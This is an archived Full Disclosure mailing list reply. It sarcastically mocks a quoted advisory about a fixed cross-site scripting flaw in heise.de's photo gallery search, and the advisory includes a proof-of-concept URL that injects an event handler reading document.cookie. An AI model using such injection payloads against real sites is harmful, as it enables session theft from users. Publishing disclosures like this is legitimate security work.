Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: http://www.heise.de - Cross-site Scripting vulnerability
From: osaft <osaft () lavabit com>
Date: Sat, 12 Jan 2013 12:07:52 +0100

On Thu, 10 Jan 2013 19:47:25 +0100
Stefan Schurtz <sschurtz () t-online de> wrote:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Advisory:             heise.de - Cross-site Scripting vulnerability
Advisory ID:          SSCHADV2013-002
Author:                       Stefan Schurtz
Affected Software:    Successfully tested on heise.de
Vendor URL:           http://www.heise.de
Vendor Status:                fixed

==========================
Vulnerability Description
==========================

http://www.heise.de is prone to a XSS vulnerability

==========================
PoC-Exploit
==========================

http://www.heise.de/foto/galerie/suche/photo/?suchwort=";
onMouseMove=alert(document.cookie) '

==========================
Solution
==========================

fixed

==========================
Disclosure Timeline
==========================

03-Jan-2013 - informed heise Security
04-Jan-2012 - fixed by developer

==========================
Credits
==========================

Vulnerability found and advisory written by Stefan Schurtz.


Now thats valeable information. Thank god that you informed about this
groundbreaking issue, Stefan. I will update my personal heise.de right
away.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]